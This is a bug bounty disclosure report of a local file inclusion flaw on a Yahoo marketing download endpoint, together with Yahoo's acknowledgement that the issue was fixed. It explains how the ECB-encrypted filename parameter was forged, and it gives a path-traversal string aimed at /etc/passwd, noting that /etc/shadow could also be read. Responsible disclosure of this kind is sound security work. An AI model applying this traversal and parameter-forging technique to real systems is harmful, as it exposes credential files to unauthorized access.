Thank you for your submission to the Yahoo Bug Bounty program. We were able to reproduce the issue you reported and have implemented appropriate fixes. We appreciate your adherence to responsible disclosure guidelines and look forward to your future participation in the program. Local File Include vulnerability on marketing-dam.yahoo.com
The vulnerable end-point is marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=, usually the get parameter for
dlurl looks like this:
When this get-parameter is url-decoded, the follwing "sub"get-parameter are visible:
The vulnerable parameter is
hj, which is usually encrypted and reflected as the filename to be downloaded.
The parameter is encoded using ecb-encryption with a blocksize of 32 characters-
I've mapped the chracters using requests like this 'aaaaaaaaaa...'(32 characters) and the server responded with: 'aTYUYTSaTZUYVZTaUZVYWWXTZVYXUTZS'. Now when I want to insert a 'T' at position 2 of the block I knew I had to use the charcter 'a'.
This way I was able to craft encrypted strings on the fly (see
Steps to reproduce and my attached poc) which were decrypted by the server and directly used to load the file from the filesystem.
Since the webserver used to serve the files is running as
root, I was able to actually read not just the usal
/etc/shadow. Unfortunately, I was not able to get code execution on the server, but given enough time an attacker could quite surely exfiltrate enough informaton from the system (since the server is running as
root) to perform remote code execution.
Steps to reproduce: got to https://brandtoolkit.yahoo.com/ and request a download for any file the download popup should appear, take the url and save it for later
Use my poc to encrypt the following string:
/../../../../../../../../etc/passwd, or use this already encrypted string
(Please note that this poc is writen with node-js in mind, but the function
ecnrypt should run in any other js-environment as long as you copy the
blocks object with it)
replace the string after
hj%3D with the encrypted string in the saved download-url
after executing the "download" you will see the contents of
Since I don't want to post any critical information that could be used after the vulnerability has been fixed I'm not attaching the
/etc/passwd file, but I'm going to give you the length of the file, which is 610. This way you can probably more quickly verify this vulnerability.